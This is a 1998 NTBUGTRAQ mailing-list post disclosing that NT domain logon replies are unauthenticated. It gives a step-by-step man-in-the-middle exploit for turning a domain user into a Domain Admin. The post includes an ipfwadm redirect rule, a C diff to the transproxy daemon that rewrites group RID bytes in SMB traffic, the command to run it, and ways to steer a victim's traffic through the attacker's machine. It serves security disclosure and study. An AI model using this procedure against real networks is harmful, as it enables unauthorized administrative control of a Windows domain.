Obtaining Domain Admins access on a LAN

Date: Wed, 28 Jan 1998 13:35:00 +0000
From: Paul Ashton <paul@ARGO.DEMON.CO.UK>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Gaining Domain Admins access on LAN

Quite a while ago when publishing the NT domain authentication
protocol, I mentioned that the contents of the NetLogonSamLogon
packet were unauthenticated.

Recently I have been using Linux's transparent proxy support to
do things like transparently filter outgoing access to port 80
through the Linux firewall via the junkbuster privacy program
(cookie removal etc.) and the squid web cache.

It turns out that changing the NetLogonSamLogon packet using
transparent proxy support is trivial. No need to bother with
recalculating TCP checksums etc.

Here's what you need to do if you want to change your domain
group DOMGRP1 (let's say it's RID 0x03F3) to Domain Admins, RID
0x0200.

Get transproxy-0.3 from http://www.nlc.net.au/
Make sure your Linux kernel has been compiled with transparent
proxy support.

Install the following firewall rule:-

ipfwadm -I -a accept -P tcp -D 0/0 139 -r 150

This will redirect attempts to connect to port 139 to the local
port 150

Start the transparent proxy daemon on port 150 that will modify
the contents of MS RPCs that go through it.

Modify tproxy.c with the following diff:
*** tproxy.c    Wed Jan 28 14:17:31 1998
--- orgtproxy.c Mon Jan 26 20:14:46 1998
***************
*** 795,814 ****
                                return;

                        default:
-                               {
-                               int i;
-                               unsigned char oldgroup[8] = {0xf3,0x03,0,0,7,0,0,0};
-                               unsigned char newgroup[8] = {0x00,0x02,0,0,7,0,0,0};
-
-                               for (i = 0; i < read_len-8; i++)
-                                       if (!memcmp(headers+i, oldgroup, 8))
-                                               memcpy(headers+i,newgroup,8);
                                if (write(sock, headers, read_len) < 0)
                                {
                                        syslog(LOG_WARNING, "write(client) failed: %m");
                                        close(proxy);
                                        return;
-                               }
                                }
                                break;
                        }
--- 795,805 ----

Compile and run
./tproxy -t -s 150 -r nobody pdchost 139

pdchost is the name or IP address of a PDC or BDC which you wish
to authenticate to.

Convince your workstation to send SMB TCP/139 stuff through your
linux firewall. You can do this in various ways such as setting
default routes, physically interposing the linux firewall between
the workstation and the rest of the network, responding to netbios
name queries using Samba, creating your own DHCP server, etc.

For the purposes of this test I changed the IP address of the
workstation and set the default route to be the Linux server.

CTL-ALT-DEL and login as a user in DOMGRP1 and voila you now have
domain admin rights.

I don't think SMB signing will protect this because the connection
to the RPC named pipe is done as a null session. But I haven't
tried it.

Run this at your own peril. The group substitution will change
all occurrences of the listed 8 bytes (RID+attributes) anywhere
in a TCP 139 packet.

Paul